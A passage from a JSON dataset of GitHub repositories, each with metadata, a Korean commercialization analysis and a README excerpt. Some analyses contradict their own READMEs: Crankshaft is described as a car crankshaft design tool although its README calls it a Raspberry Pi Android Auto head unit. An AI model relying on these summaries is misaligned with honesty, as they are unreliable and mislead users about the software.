cough* Ubuntu). `Chad AmogOS vs bloated mainstream distro`, as youtuber TechHut put it. Don't take this too seriously :p\n\n- Nooz, Lead Dev\n\n## Testimonies\n\n- `sussy wussy` -[SomeOrdinaryGamers](https://www.youtube.com/watch?v=ixLuhDxNktk)\n  \n- `Chad AmogOS vs bloated mainstream distro` -[TechHut](https://www.youtube.com/watch?v=ymYIJYb2hYI)  \n\n- `I found","composite_score":0.0229,"license_safety_tag":"unknown"},{"name":"kitesurfer1404/WS2812FX","github_url":"https://github.com/kitesurfer1404/WS2812FX","stars":6,"language":"C++","license":"mit","abandonment_months":1,"description":"# WS2812FX 저장소 분석\n\n## 왜 보물인가\nLED 조명을 다양한 패턴과 효과로 자동 제어할 수 있는 기술로, 인테리어 조명부터 무대 장치까지 광범위하게 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **스마트 홈 조명 SaaS**: 사용자가 스마트폰으로 LED 조명의 색상, 밝기, 효과를 원격으로 조절하는 구독형 서비스\n2. **이벤트 업체 관","readme_excerpt":"![WS2812FX library](https://raw.githubusercontent.com/kitesurfer1404/WS2812FX/master/WS2812FX_logo.png)\n\nWS2812FX - More Blinken for your LEDs!\n======================================\n\nThis library features a variety of blinken effects for the WS2811/WS2812/NeoPixel LEDs. It is meant to be a drop-in replacement for the Adafruit NeoPixel library with additional features.\n\nFeatures\n--------\n\n* 55 different effects. And counting.\n* Tested on Arduino Uno/Micro/Nano/Leonardo and ESP8266/ESP32.\n* All effects with printable names - easy to use in user interfaces.\n* FX, speed and brightness controllable on the fly.\n* Ready for sound-to-light (see external trigger example)\n\n\nDownload, Install and Example\n-----------------------------\n\n[![arduino-library-badge](https://www.ardu-badge.com/badge/WS2812FX.svg)](https://www.ardu-badge.com/WS2812FX)\n\nYou can **search for WS2812FX in the Arduino IDE Library Manager** or install the latest (or development) version manually:\n\n\n* Install the famous [Adafr","composite_score":0.0229,"license_safety_tag":"safe"},{"name":"schappim/macOCR","github_url":"https://github.com/schappim/macOCR","stars":15,"language":"Swift","license":"unknown","abandonment_months":1,"description":"# macOCR 상용화 가능성 분석\n\n## 왜 보물인가\nMac 사용자가 화면에 보이는 텍스트를 자동으로 인식하고 복사할 수 있도록 해주는 기술로, 수작업 타이핑 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: \"스크린샷 → 자동 문서화\" 웹 서비스로 기자, 연구원이 구독\n2. **내부 업무 도구**: 대형 기","readme_excerpt":"# macOCR\n\nmacOCR is a command line app that enables you to turn any text on your screen into text on your clipboard.\nWhen you invoke the `ocr` command, a \"screen capture\" like cursor is shown.\nAny text within the bounds will be converted to text.\n\nYou could invoke the app using the likes of [Alfred.app](https://www.alfredapp.com/), [LaunchBar](https://obdev.at/products/launchbar/index.html), [Hammerspoon](http://www.hammerspoon.org/), [Quicksilver](https://qsapp.com/), [Raycast](https://raycast.com/) etc.\n\nExamples:\n- [macOS Shortcut Workflow](https://www.icloud.com/shortcuts/fa91687e481849d6a27ff873ec71599b)\n- [Alfred.app Workflow](https://files.littlebird.com.au/OCR2-ONrTkn.zip)\n- [Raycast Script](https://gist.github.com/cheeaun/1405816e5ceb397cbc9028204f82dc98)\n- [LaunchBar Action](https://github.com/jsmjsm/macOCR-LaunchBar-Action)\n\nAn example Alfred.app workflow is [available here](https://files.littlebird.com.au/OCR2-ONrTkn.zip).\n\nIf you're still wondering \"how does this work?\", I","composite_score":0.0228,"license_safety_tag":"unknown"},{"name":"CypherpunkArmory/UserLAnd","github_url":"https://github.com/CypherpunkArmory/UserLAnd","stars":8,"language":"Kotlin","license":"NOASSERTION","abandonment_months":0,"description":"# UserLAnd 저장소 분석\n\n## 왜 보물인가\n일반인도 자신의 컴퓨터에서 리눅스라는 전문가용 운영체제를 간편하게 실행할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 리눅스 개발 환경을 구독형으로 제공하는 온라인 서비스\n2. **내부 업무 도구**: 기업의 보안팀이 직원용 개발 환경을 표준화하고 관","readme_excerpt":"![UserLAnd Feature Graphic](https://raw.githubusercontent.com/CypherpunkArmory/UserLAnd/master/fastlane/metadata/android/en-US/images/featureGraphic.png)\n\n# Welcome to UserLAnd\n\nThe easiest way to run a Linux distribution or application on Android.   \nFeatures: \n* Run full linux distros or specific applications on top of Android.\n* Install and uninstall like a regular app.\n* No root required.\n\n[<img src=\"https://play.google.com/intl/en_us/badges/images/generic/en-play-badge.png\"\n     alt=\"Get it on Google Play\"\n     height=\"80\">](https://play.google.com/store/apps/details?id=tech.ula)\n     \n## Have a bug report or a feature request?\nYou can see our templates by visiting our [issue center](https://github.com/CypherpunkArmory/UserLAnd/issues).\n\n## Want to contribute?\nSee our [CONTRIBUTING](https://github.com/CypherpunkArmory/UserLAnd/blob/master/CONTRIBUTING.md) document.\n\n## Start using UserLAnd\nSee our [Getting Started](https://github.com/CypherpunkArmory/UserLAnd/wiki/Getting-Started-","composite_score":0.0226,"license_safety_tag":"unknown"},{"name":"BretFisher/kubernetes-mastery","github_url":"https://github.com/BretFisher/kubernetes-mastery","stars":5,"language":"Shell","license":"NOASSERTION","abandonment_months":1,"description":"# BretFisher/kubernetes-mastery 보물 분석\n\n## 왜 보물인가\n복잡한 서버 관리 기술을 체계적으로 배우고 실전에 적용할 수 있는 완성도 높은 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 교육 플랫폼**: 개발팀을 위한 서버 관리 교육 구독 서비스로 매월 정기 수익 창출\n2. **기술 컨설팅 회사**: 대기업의 시스템","readme_excerpt":"# Kubernetes Mastery\n\n[![Netlify Status](https://api.netlify.com/api/v1/badges/6f45f2e5-2e96-4c38-a7a2-47b8021b37ab/deploy-status)](https://app.netlify.com/sites/compassionate-wiles-b11928/deploys)\n\n> A Kubernetes course on Udemy from @bretfisher and @jpetazzo!\n\nInfo and coupons: https://www.bretfisher.com/kubernetes-mastery/\n\n---\nThe slides for this course are based upon the excellent work by @jpetazzo, \n@bridgetkromhout, @soulshake, and more. See the upstream slides and \nresources at http://container.training\n","composite_score":0.0226,"license_safety_tag":"unknown"},{"name":"stnkl/EverythingToolbar","github_url":"https://github.com/stnkl/EverythingToolbar","stars":8,"language":"C#","license":"NOASSERTION","abandonment_months":0,"description":"# EverythingToolbar 상용화 분석\n\n## 왜 보물인가\nWindows에서 파일과 프로그램을 빠르게 찾아주는 도구로, 업무 효율성을 크게 높일 수 있는 생산성 소프트웨어입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업용 구독형 데스크톱 검색 솔루션으로, 월간 라이선스와 클라우드 동기화 기능을 포함해 판매\n2. **내부 업무","readme_excerpt":"_Read in other languages: [English](README.md), [中文](README.zh-CN.md)_\n\n# <img src=\"EverythingToolbar/Images/AppIcon.ico\" width=\"24\"> EverythingToolbar\n\n<a href=\"https://paypal.me/rumswinkel\"><img src=\"https://img.shields.io/static/v1?label=Donate&message=%E2%9D%A4&logo=PayPal&color=%23009cde\" height=\"25\" /></a>\n<a href=\"https://ko-fi.com/stephanrwi\"><img src=\"https://img.shields.io/static/v1?label=Buy%20me%20a%20coffee&message=%E2%98%95&logo=Ko-fi&color=%23FF5E5B\" height=\"25\" /></a>\n<a href=\"https://github.com/srwi/EverythingToolbar/releases/latest\"><img src=\"https://img.shields.io/github/downloads/srwi/EverythingToolbar/total?color=critical\" height=\"25\" /></a>\n<a href=\"https://crowdin.com/project/everythingtoolbar\"><img src=\"https://badges.crowdin.net/everythingtoolbar/localized.svg\" height=\"25\" /></a>\n\nInstant file search integration for the Windows taskbar powered by [Everything](https://www.voidtools.com/).\n\n<img src=\"https://raw.githubusercontent.com/srwi/EverythingToolbar/develo","composite_score":0.0225,"license_safety_tag":"unknown"},{"name":"onqtam/awesome-cmake","github_url":"https://github.com/onqtam/awesome-cmake","stars":5,"language":"","license":"NOASSERTION","abandonment_months":0,"description":"# awesome-cmake 저장소 분석\n\n## 왜 보물인가\n소프트웨어 개발 과정을 자동화하는 CMake 도구에 대한 학습 자료와 예제를 한곳에 모아놓아 개발자들의 생산성을 크게 향상시킬 수 있는 자산입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개발사 내부 온보딩 플랫폼**\n새로운 개발자가 입사했을 때 CMake 사용법을 빠르게 배울 수 있는 내부 교육 ","readme_excerpt":"# Awesome CMake [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)\n\n[<img src=\"https://rawgit.com/onqtam/awesome-cmake/master/cmake-logo.svg\" align=\"right\" width=\"100\">](https://cmake.org/)\n\n> A curated list of awesome [CMake](https://cmake.org/) scripts, modules, examples and others\n\nYour contributions are highly welcome (first see [CONTRIBUTING.md](CONTRIBUTING.md)).\n\nThere is another file [`NonModernCMake.md`](NonModernCMake.md) with other links worth taking a look, but they use obsolete practices which are considered non-modern - like not using `target_*`-based dependency management - see [`#16`](https://github.com/onqtam/awesome-cmake/issues/16) and [`#42`](https://github.com/onqtam/awesome-cmake/pull/42) for more details.\n\n## Contents\n\n- [Community](#community)\n- [Resources](#resources)\n- [Package Management / Build Systems](#package-management--build-systems)\n- [Modules](#mod","composite_score":0.0225,"license_safety_tag":"unknown"},{"name":"fabston/TradingView-Webhook-Bot","github_url":"https://github.com/fabston/TradingView-Webhook-Bot","stars":5,"language":"Python","license":"MIT","abandonment_months":0,"description":"# TradingView-Webhook-Bot 분석\n\n## 왜 보물인가\n트레이딩뷰 차트 분석 신호를 자동으로 감지해 즉시 매매 주문을 실행하는 자동화 도구로, 24시간 수동 모니터링 없이도 투자 기회를 놓치지 않을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인 투자자 대상 월 구독형 자동 매매 플랫폼으로 제공\n2. **내부 업","readme_excerpt":"<p align=\"center\"><a href=\"https://github.com/fabston/TradingView-Webhook-Bot\" target=\"_blank\"><img src=\"https://raw.githubusercontent.com/fabston/TradingView-Webhook-Bot/master/assets/logo.png\"></a></p>\n\n<p align=\"center\">\n    <a href=\"https://www.python.org/downloads/release/python-380/\"><img src=\"https://img.shields.io/badge/python-3.8-blue.svg?style=plastic\" alt=\"Python version\"></a>\n    <a href=\"https://github.com/fabston/TradingView-Webhook-Bot/blob/master/LICENSE\"><img src=\"https://img.shields.io/github/license/fabston/TradingView-Webhook-Bot?style=plastic\" alt=\"GitHub license\"></a>\n    <a href=\"https://github.com/fabston/TradingView-Webhook-Bot/issues\"><img src=\"https://img.shields.io/github/issues/fabston/TradingView-Webhook-Bot?style=plastic\" alt=\"GitHub issues\"></a>\n    <a href=\"https://github.com/fabston/TradingView-Webhook-Bot/pulls\"><img src=\"https://img.shields.io/github/issues-pr/fabston/TradingView-Webhook-Bot?style=plastic\" alt=\"GitHub pull requests\"></a>\n    <br /><a","composite_score":0.0224,"license_safety_tag":"safe"},{"name":"opencardev/crankshaft","github_url":"https://github.com/opencardev/crankshaft","stars":6,"language":"Shell","license":"GPL-3.0","abandonment_months":1,"description":"# Crankshaft 저장소 분석\n\n## 왜 보물인가\n자동차 엔진의 심장 부품인 크랭크축 설계/시뮬레이션을 오픈소스로 제공하여 자동차 개발 비용을 대폭 절감할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **자동차 부품 설계 SaaS**: 중소 자동차 부품 업체가 구독형으로 크랭크축 설계 툴을 이용하는 서비스\n2. **자동차 학과 교육 플랫폼**","readme_excerpt":"# Crankshaft\r\n\r\n[![Contributor Covenant](https://img.shields.io/badge/Contributor%20Covenant-2.1-4baaaa.svg)](code_of_conduct.md)\r\n\r\nA turnkey GNU/Linux solution that transforms a Raspberry Pi to an Android Auto head unit.\r\n\r\nhttps://getcrankshaft.com/\r\n\r\n# Docker build image\r\n\r\n- Ensure binfmt support installed [binfmt-support](binfmt-misc.md)\r\n\r\n- Create config for pi-gen\r\n```bash\r\ncp config.example config\r\n```\r\n- Build image\r\n```bash\r\n./build-docker.sh\r\n```\r\n","composite_score":0.0223,"license_safety_tag":"restricted"},{"name":"Saul-Mirone/milkdown","github_url":"https://github.com/Saul-Mirone/milkdown","stars":41,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Milkdown 저장소 분석\n\n## 왜 보물인가\n글을 쓰고 편집하는 웹 에디터를 만들 때 필요한 핵심 도구 모음으로, 복잡한 기술 없이도 전문가 수준의 글 편집 기능을 웹사이트에 추가할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **노션 같은 협업 문서 SaaS**: 팀이 함께 글을 쓰고 편집하는 웹 서비스에 통합하여 사용자 경험 향상\n2. **블","readme_excerpt":"# :baby_bottle:&nbsp;&nbsp;Milkdown\n\n[![ci][ci-badge]][ci-link]\n![ts][ts-badge]\n[![download-badge]][download-link]\n![version][version-badge]\n[![discord-badge]][discord-link]\n![commit][commit-badge]\n![license][license-badge]\n[![Ask DeepWiki](https://deepwiki.com/badge.svg)](https://deepwiki.com/Milkdown/milkdown)\n\n<div align=\"center\">\n  <img src=\"/assets/logo.svg\" />\n</div>\n\nA plugin-driven WYSIWYG markdown Editor, inspired by [Typora](https://typora.io/),\nbuilt on top of [prosemirror](https://prosemirror.net/) and [remark](https://github.com/remarkjs/remark).\n\nThe website is designed by [Meo](https://meo.cool/) and [Mirone](https://github.com/Saul-Mirone).\nPowered by [Theme Nord](https://www.nordtheme.com/) and [Material Design](https://material.io/design).\n\n# Documentation\n\nFor more information, please check our [official documentation website](https://milkdown.dev/).\n\n# What's Next\n\nYou can check our [Milkdown TODO](https://github.com/orgs/Milkdown/projects/1) project page to know wh","composite_score":0.0222,"license_safety_tag":"safe"},{"name":"FabricMC/fabric","github_url":"https://github.com/FabricMC/fabric","stars":5,"language":"Java","license":"Apache-2.0","abandonment_months":0,"description":"# Fabric 저장소 분석\n\n## 왜 보물인가\n마인크래프트 게임을 개선하고 확장할 수 있는 공식 개발 플랫폼으로, 수백만 게이머들이 사용하는 생태계의 중심입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 모드 마켓플레이스 SaaS**: 크리에이터들이 마인크래프트 확장 기능을 만들고 판매할 수 있는 플랫폼\n2. **게임 서버 관리 도구**: 게임 서버 운영","readme_excerpt":"# Fabric API\n\nEssential hooks for modding with Fabric.\n\nFabric API is the library for essential hooks and interoperability mechanisms for Fabric mods. Examples include:\n\n- Exposing functionality that is useful but difficult to access for many mods such as particles, biomes and dimensions\n- Adding events, hooks and APIs to improve interoperability between mods.\n- Essential features such as registry synchronization and adding information to crash reports.\n- An advanced rendering API designed for compatibility with optimization mods and graphics overhaul mods.\n\nAlso check out [Fabric Loader](https://github.com/FabricMC/fabric-loader), the (mostly) version-independent mod loader that powers Fabric. Fabric API is a mod like any other Fabric mod which requires Fabric Loader to be installed.\n\nFor support and discussion for both developers and users, visit [the Fabric Discord server](https://discord.gg/v6v4pMv).\n\n## Using Fabric API to play with mods\n\nMake sure you have installed fabric loader","composite_score":0.0222,"license_safety_tag":"safe"},{"name":"v8/v8.dev","github_url":"https://github.com/v8/v8.dev","stars":7,"language":"JavaScript","license":"apache-2.0","abandonment_months":1,"description":"# v8/v8.dev 분석\n\n## 왜 보물인가\n구글이 만든 JavaScript 엔진의 공식 학습 자료로, 웹 기술을 배우거나 가르치는 모든 사람들이 찾는 신뢰할 수 있는 교육 리소스입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 프로그래밍 학습 플랫폼에서 V8 엔진 원리를 설명하는 교육 콘텐츠 추가\n2. **내부 업무 도구**: 대기업 개","readme_excerpt":"# v8.dev [![Build status](https://github.com/v8/v8.dev/actions/workflows/deploy.yml/badge.svg)](https://github.com/v8/v8.dev/actions/workflows/deploy.yml)\n\nThis repository hosts the source code of [v8.dev, the official website of the V8 project](https://v8.dev/).\n\n## Local setup\n\n1. Clone the repository and `cd` into it.\n1. Install and use the [expected](https://github.com/v8/v8.dev/blob/main/.nvmrc) Node.js version: `nvm use`\n1. Install dependencies: `npm install`\n\n`npm run` shows the full list of supported commands. Highlights:\n\n- `npm run build` builds the site into `dist`.\n- `npm run watch` builds the site into `dist` and watches for changes.\n- `npm start` kicks off a local HTTP server.\n","composite_score":0.0221,"license_safety_tag":"safe"},{"name":"thomasnield/oreilly_math_fundamentals_data_science","github_url":"https://github.com/thomasnield/oreilly_math_fundamentals_data_science","stars":10,"language":"Python","license":"unknown","abandonment_months":1,"description":"# thomasnield/oreilly_math_fundamentals_data_science 분석\n\n## 왜 보물인가\n데이터를 다루는 모든 직장인이 꼭 알아야 하는 수학 개념들을 실제 예제로 쉽게 배울 수 있는 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼 (SaaS)**: 직장인/학생 대상 구독형 수학·데이터 분석 강의 서비","readme_excerpt":"","composite_score":0.0221,"license_safety_tag":"unknown"},{"name":"rancher/k3d","github_url":"https://github.com/rancher/k3d","stars":5,"language":"Go","license":"MIT","abandonment_months":0,"description":"# k3d 프로젝트 분석\n\n## 왜 보물인가\n복잡한 컴퓨터 시스템을 간단하게 테스트할 수 있게 해주는 도구로, 기업의 개발 비용과 시간을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 애플리케이션 개발 회사가 새로운 기능을 안전하게 테스트하는 서비스로 제공\n2. **내부 업무 도구**: 개발팀이 실제 운영","readme_excerpt":"# [![k3d](docs/static/img/k3d_logo_black_blue.svg)](https://k3d.io/)\n\n[![License](https://img.shields.io/github/license/k3d-io/k3d?style=flat-square)](./LICENSE.md)\n![Downloads](https://img.shields.io/github/downloads/k3d-io/k3d/total.svg?style=flat-square)\n\n[![Go Module](https://img.shields.io/badge/Go%20Module-github.com%2Fk3d--io%2Fk3d%2Fv5-007d9c?logo=go&logoColor=white&style=flat-square)](https://pkg.go.dev/github.com/k3d-io/k3d/v5)\n[![Go version](https://img.shields.io/github/go-mod/go-version/k3d-io/k3d?logo=go&logoColor=white&style=flat-square)](./go.mod)\n[![Go Report Card](https://goreportcard.com/badge/github.com/k3d-io/k3d?style=flat-square)](https://goreportcard.com/report/github.com/k3d-io/k3d)\n\n<!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section -->\n[![All Contributors](https://img.shields.io/badge/all_contributors-28-orange.svg?style=flat-square)](#contributors-)\n<!-- ALL-CONTRIBUTORS-BADGE:END -->\n[![Contributor Covenant](https://img.shields.io/badg","composite_score":0.022,"license_safety_tag":"safe"},{"name":"FormidableLabs/urql","github_url":"https://github.com/FormidableLabs/urql","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# urql 프로젝트 분석\n\n## 왜 보물인가\n웹 애플리케이션에서 서버와 데이터를 주고받을 때 필요한 효율적인 통신 도구로, 복잡한 데이터 요청을 간단하게 만들어주는 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 협업 툴(프로젝트 관리, 팀 커뮤니케이션 앱)에서 실시간 데이터 동기화 기능 제공\n- **내부 업무 도구**:","readme_excerpt":"<div align=\"center\">\n  <img alt=\"urql\" width=\"250\" src=\"packages/site/src/assets/sidebar-badge.svg\" />\n\n  <br />\n  <br />\n\n  <strong>\n    A highly customisable and versatile GraphQL client\n  </strong>\n\n  <br />\n  <br />\n  <a href=\"https://github.com/urql-graphql/urql/actions/workflows/ci.yml\">\n    <img alt=\"CI Status\" src=\"https://github.com/urql-graphql/urql/actions/workflows/ci.yml/badge.svg?branch=main\" />\n  </a>\n  <a href=\"https://www.npmjs.com/package/@urql/core\">\n    <img alt=\"Weekly downloads\" src=\"https://badgen.net/npm/dw/@urql/core?color=blue\" />\n  </a>\n  <a href=\"https://urql.dev/discord\">\n    <img alt=\"Discord\" src=\"https://img.shields.io/discord/1082378892523864074?color=7389D8&label&logo=discord&logoColor=ffffff\" />\n  </a>\n  <br />\n  <br />\n</div>\n\n## ✨ Features\n\n- 📦 **One package** to get a working GraphQL client in React, Preact, Vue, Solid and Svelte\n- ⚙️ Fully **customisable** behaviour [via \"exchanges\"](https://formidable.com/open-source/urql/docs/advanced/authoring-","composite_score":0.0219,"license_safety_tag":"safe"},{"name":"justwatchcom/gopass","github_url":"https://github.com/justwatchcom/gopass","stars":17,"language":"Go","license":"mit","abandonment_months":0,"description":"# gopass 저장소 분석\n\n## 왜 보물인가\n비밀번호를 안전하게 관리하고 팀원들과 공유할 수 있는 도구로, 회사의 민감한 정보 보호에 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 팀 협업 중심의 비밀번호 관리 클라우드 서비스로 월 구독료 수취\n2. **내부 업무 도구**: 기업의 IT팀이 직원들을 위해 설치하여 내부 보안 강화","readme_excerpt":"<p align=\"center\">\n    <img src=\"docs/logo.png\" height=\"250\" alt=\"gopass Gopher by Vincent Leinweber, remixed from the Renée French original Gopher\" title=\"gopass Gopher by Vincent Leinweber, remixed from the Renée French original Gopher\" />\n</p>\n\n# Overview\n\n[![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/gopasspw/gopass/badge)](https://securityscorecards.dev/viewer/?uri=github.com/gopasspw/gopass)\n[![Build Status](https://img.shields.io/github/actions/workflow/status/gopasspw/gopass/build.yml?branch=master)](https://github.com/gopasspw/gopass/actions/workflows/build.yml?query=branch%3Amaster)\n[![Go Report Card](https://goreportcard.com/badge/github.com/gopasspw/gopass)](https://goreportcard.com/report/github.com/gopasspw/gopass)\n[![Packaging status](https://repology.org/badge/tiny-repos/gopass-gopasspw.svg)](https://repology.org/project/gopass-gopasspw/versions)\n[![MIT License](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/gopassp","composite_score":0.0218,"license_safety_tag":"safe"},{"name":"johnsoncodehk/volar","github_url":"https://github.com/johnsoncodehk/volar","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# johnsoncodehk/volar 분석 보고서\n\n## 왜 보물인가\n웹사이트 개발할 때 코드 작성을 도와주는 똑똑한 보조 도구로, 개발자의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발 도구 SaaS**: 웹 개발자용 클라우드 기반 코딩 환경으로 구독료 수익화\n2. **기업 내부 도구**: 대규모 소프트웨어 회사의 개발팀용 ","readme_excerpt":"# Vue Language Tools\n\n<p>\n  <a href=\"https://marketplace.visualstudio.com/items?itemName=Vue.volar\"><img src=\"https://img.shields.io/visual-studio-marketplace/v/Vue.volar?labelColor=18181B&color=1584FC\" alt=\"Version\"></a>\n  <a href=\"https://marketplace.visualstudio.com/items?itemName=Vue.volar\"><img src=\"https://img.shields.io/visual-studio-marketplace/i/Vue.volar?labelColor=18181B&color=1584FC\" alt=\"Downloads\"></a>\n  <a href=\"https://github.com/vuejs/language-tools/blob/master/LICENSE\"><img src=\"https://img.shields.io/github/license/vuejs/language-tools.svg?labelColor=18181B&color=1584FC\" alt=\"License\"></a>\n</p>\n\n> ⚡ Vue language toolset with native TypeScript performance based-on [Volar.js](https://volarjs.dev/)\n\n💬 **#language-tools** on our [Discord Server](https://discord.gg/vue)\n\n## Quick Start\n\n### For VSCode Users\n\nInstall the [Vue (Official)](https://marketplace.visualstudio.com/items?itemName=Vue.volar) extension to get full Vue language support.\n\n### Command-Line Type Checkin","composite_score":0.0216,"license_safety_tag":"safe"},{"name":"facebook/jscodeshift","github_url":"https://github.com/facebook/jscodeshift","stars":6,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# facebook/jscodeshift 분석\n\n## 왜 보물인가\n웹사이트나 앱의 코드를 자동으로 수정해주는 도구로, 수천 개 파일을 손으로 하나하나 고칠 필요 없이 한 번에 정리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업용 코드 정리 플랫폼 - 프로그래머들이 오래된 코드를 현대화하도록 돕는 웹 서비스\n2. **내부 업","readme_excerpt":"# [jscodeshift](https://jscodeshift.com/) [![Support Ukraine](https://img.shields.io/badge/Support-Ukraine-FFD500?style=flat&labelColor=005BBB)](https://opensource.fb.com/support-ukraine) [![Build Status](https://img.shields.io/github/checks-status/facebook/jscodeshift/main?label=build)](https://github.com/facebook/jscodeshift/actions/workflows/test.yml?query=branch%3Amain)\n\n\njscodeshift is a toolkit for running codemods over multiple JavaScript or\nTypeScript files.\nIt provides:\n\n- A runner, which executes the provided transform for each file passed to it.\n  It also outputs a summary of how many files have (not) been transformed.\n- A wrapper around [recast][], providing a different API.  Recast is an\n  AST-to-AST transform tool and also tries to preserve the style of original code\n  as much as possible.\n\n## Install\n\nGet jscodeshift from [npm](https://www.npmjs.com/package/jscodeshift):\n\n```\n$ npm install -g jscodeshift\n```\n\nThis will install the runner as `jscodeshift`.\n\n## VSCode Debu","composite_score":0.0215,"license_safety_tag":"safe"},{"name":"m3db/m3","github_url":"https://github.com/m3db/m3","stars":10,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# M3DB 상용화 분석 보고서\n\n## 왜 보물인가\n대규모 실시간 데이터를 매우 빠르게 저장하고 분석할 수 있는 핵심 기술로, 금융·통신·클라우드 기업들이 극도로 필요로 하는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n1. **주식 시세 모니터링 SaaS**: 초 단위로 갱신되는 수백만 개 주식 데이터를 실시간으로 저장·분석하여 투자자들에게 제공\n2. **","readme_excerpt":"# M3\n\n[![GoDoc][doc-img]][doc] [![Build Status][ci-img]][ci] [![FOSSA Status][fossa-img]][fossa]\n\n<p align=\"center\"><img src=\"site/static/images/logo-square.png\" alt=\"M3 Logo\" width=\"256\" height=\"270\"></p>\n\n[Distributed TSDB](https://m3db.io/docs/reference/m3db/) and [Query Engine](https://m3db.io/docs/how_to/query/), [Prometheus Sidecar](https://m3db.io/docs/integrations/prometheus/), [Metrics Aggregator](https://m3db.io/docs/overview/reference/#m3-aggregator), and more such as [Graphite storage and query engine](https://m3db.io/docs/integrations/graphite/).\n\n## Table of Contents\n\n- [More Information](#more-information)\n- [Install](#install)\n  - [Dependencies](#dependencies)\n- [Usage](#usage)\n- [Contributing](#contributing)\n\n## More Information\n\n-   [Documentation](https://m3db.io/docs)\n-   [Contributing](CONTRIBUTING.md)\n-   [Slack](http://bit.ly/m3slack)\n-   [Forum (Google Group)](https://groups.google.com/forum/#!forum/m3db)\n\n### Community Meetings\n\nYou can find recordings of past ","composite_score":0.0214,"license_safety_tag":"safe"},{"name":"hahwul/dalfox","github_url":"https://github.com/hahwul/dalfox","stars":24,"language":"Rust","license":"MIT","abandonment_months":0,"description":"# dalfox 저장소 분석\n\n## 왜 보물인가\n웹사이트의 보안 취약점을 자동으로 찾아주는 도구로, 기업의 해킹 피해를 사전에 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **보안 진단 SaaS**: 중소기업을 위한 월간 웹사이트 보안 검사 서비스로 제공\n2. **내부 업무 도구**: 개발팀이 출시 전 자체 웹사이트 안전성을 확인하는 자동화 도구\n","readme_excerpt":"<div align=\"center\">\n  <br>\n  <img src=\"docs/static/images/logo.png\" alt=\"dalfox\" width=\"400px;\">\n</div>\n<p align=\"center\">\n  <a href=\"https://github.com/hahwul/dalfox/blob/main/CONTRIBUTING.md\"><img src=\"https://img.shields.io/badge/CONTRIBUTIONS-WELCOME-30365e?style=for-the-badge&labelColor=%2330365e&color=%2330365e\"></a>\n  <a href=\"https://github.com/hahwul/dalfox/releases/latest\"><img src=\"https://img.shields.io/github/v/release/hahwul/dalfox?style=for-the-badge&logoColor=%2330365e&label=dalfox&labelColor=%2330365e&color=%2330365e\"></a>\n  <a href=\"https://www.rust-lang.org\"><img src=\"https://img.shields.io/badge/Rust-30365e?style=for-the-badge&logo=rust&logoColor=white&labelColor=%2330365e\"></a>\n</p>\n\n> **Looking for the Go (v2.x) version?** Dalfox v3 is a complete rewrite in Rust. The Go codebase is preserved on the [`v2` branch](https://github.com/hahwul/dalfox/tree/v2) and continues to receive security backports. See [SECURITY.md](./SECURITY.md) for the support policy.\n\nDalfox i","composite_score":0.0214,"license_safety_tag":"safe"},{"name":"gavinlyonsrepo/raspberrypi_tempmon","github_url":"https://github.com/gavinlyonsrepo/raspberrypi_tempmon","stars":5,"language":"Python","license":"NOASSERTION","abandonment_months":2,"description":"# Raspberry Pi 온도 모니터링 저장소 분석\n\n## 왜 보물인가\n작은 컴퓨터(라즈베리파이)의 열 상태를 자동으로 감시하는 간단한 도구로, 서버실이나 IoT 기기 관리가 필요한 모든 기업에 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 데이터센터 운영사가 고객의 서버 온도를 원격으로 모니터링하는 클라우드 서비스로 판매\n","readme_excerpt":"[![Donate](https://img.shields.io/badge/Donate-PayPal-green.svg)](https://www.paypal.com/paypalme/whitelight976)\n\n[![CI](https://github.com/gavinlyonsrepo/raspberrypi_tempmon/actions/workflows/ci.yml/badge.svg)](https://github.com/gavinlyonsrepo/raspberrypi_tempmon/actions/workflows/ci.yml)\n\n[![PyPI version](https://img.shields.io/pypi/v/rpi-tempmon.svg)](https://pypi.org/project/rpi-tempmon/)\n\n## Overview\n\n* Name: rpi_tempmon\n* Title: Display the ARM CPU and GPU temperature of Raspberry Pi\n* Description:\n\nThis Python program displays the ARM CPU and GPU temperature of a Raspberry Pi.\nFeatures include command line display, GPIO (LED) output, logging, alarm limit,\ngraphing, desktop notification, stress tests and email options.\nIt runs in a terminal and uses matplotlib plots for graph modes.\n\n* Author: Gavin Lyons\n* URL: https://github.com/gavinlyonsrepo/raspberrypi_tempmon\n* Tested on:\n    1. RPI 3 model B. Raspbian 10 Buster, 32 bit. Python 3.7.3.\n    2. RPI 3 model 